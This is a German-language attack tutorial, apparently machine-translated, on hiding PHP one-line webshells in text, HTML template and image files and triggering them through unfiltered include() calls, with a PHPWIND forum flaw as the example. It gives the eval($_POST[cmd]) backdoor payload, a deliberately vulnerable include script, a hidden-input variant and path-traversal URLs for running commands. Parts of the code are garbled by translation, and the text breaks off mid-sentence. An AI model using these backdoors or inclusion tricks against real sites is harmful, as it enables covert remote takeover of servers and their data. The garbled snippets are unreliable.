Sie müssen wissen, dass, wenn Sie die PHP-Anweisung einfach in das Bild einfügen, diese ohnehin nicht ausgeführt wird, da PHP nur Dateien mit der Erweiterung php analysiert. Daher ist es notwendig, die im Bild versteckten PHP-Anweisungen ausführen zu können. Wir verwenden lediglich die aufrufenden Funktionen in PHP: include, require usw.
Wir erinnern uns noch an den Artikel über das Verstecken von Trojanern in Bildern vor ein paar Tagen. Das heißt, verwenden Sie Anweisungen wie include("x.gif") in der PHP-Datei, um die im Bild versteckten Trojaner-Anweisungen aufzurufen. Die Aussagen in ASP sind ähnlich. Es scheint sehr versteckt zu sein, aber wenn Sie das Bild direkt aufrufen, wird es für jemanden, der sich ein wenig mit PHP auskennt, nicht schwer sein, etwas Verdächtiges zu finden. Da es schwierig ist, Parameter mit der GET-Methode in der URL zu übergeben, kann die Leistung der Trojaner-Einfügung nicht voll ausgenutzt werden.
Die Include-Funktion wird in PHP häufig verwendet und verursacht daher zu viele Sicherheitsprobleme. Die Schwachstelle von PHPWIND1.36 wird beispielsweise durch die fehlende Filterung von Variablen hinter include verursacht. Daraus können wir ähnliche Anweisungen konstruieren, die wir in PHP-Dateien einfügen. Dann verstecken Sie den Trojaner in einem Bild oder einer HTML-Datei, was sozusagen versteckter ist. Fügen Sie beispielsweise die folgende Anweisung in das PHPWIND-Forum ein: < ''?@include include/.$PHPWIND_ROOT;? < mailto:?@include 'includ/'.$PHPWIND_ROOT;?>>Allgemeine Administratoren können es nicht sehen.
Mit Hilfe der Include-Funktion können wir PHP-Trojaner in vielen Dateitypen wie TXT-, HTML- und Bilddateien verstecken. Da diese drei Dateitypen, TXT-, HTML- und Bilddateien, in Foren und Artikelsystemen am häufigsten vorkommen, führen wir die Tests in der folgenden Reihenfolge durch.
Erstellen Sie zunächst eine PHP-Datei test.php. Der Inhalt der Datei lautet:
<?php
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt-Dateien sind im Allgemeinen Beschreibungsdateien, sodass wir den Ein-Satz-Trojaner in die Beschreibungsdatei des Verzeichnisses einfügen können. Erstellen Sie einfach eine TXT-Datei t.txt. Wir fügen den Satz Trojan <?eval($_POST[cmd]);?> in die t.txt-Datei ein. Dann besuchen Sie http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt > Wenn Sie t sehen Der Inhalt von txt erweist sich als in Ordnung. Fügen Sie dann die Adresse des Lanker-Micro-PHP-Backdoor-Clients zu http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/ index.php? hinzu. PHPWIND_ROOT=../robots.txt > Fügen Sie einfach cmd zum Passwort hinzu und Sie können die von der Ausführung zurückgegebenen Ergebnisse sehen.
Bei HTML-Dateien handelt es sich im Allgemeinen um Vorlagendateien. Damit das in die HTML-Datei eingefügte Trojanische Pferd aufgerufen und ausgeführt werden kann, ohne dass es angezeigt wird, können wir im HTML ein Textfeld mit versteckten Attributen hinzufügen, wie zum Beispiel: <input type=hidden value="<?eval($ _POST[cmd ]);?>"> Verwenden Sie dann die gleiche Methode wie oben. Die Rückgabeergebnisse der Ausführung können im Allgemeinen durch Anzeigen der Quelldatei eingesehen werden. Nutzen Sie beispielsweise die Funktion zum Anzeigen des Verzeichnisses dieses Programms. Zeigen Sie den Inhalt der Quelldatei als <input type=hidden value="C:Uniserver2_7swwwtest"> an. Ich kann das Verzeichnis als C:Uniserver2_7swwwtest abrufen.
Lassen Sie uns nun über Bilddateien sprechen. Der giftigste Trick besteht darin, das Trojanische Pferd im Bild zu verstecken. Wir können ein Bild direkt bearbeiten und am Ende des Bildes <?eval($_POST[cmd]);?> einfügen.
Nach dem Test hat es im Allgemeinen keine Auswirkungen auf das Bild. Fügen Sie dann auf die gleiche Weise die Client-Trojaner-Adresse hinzu<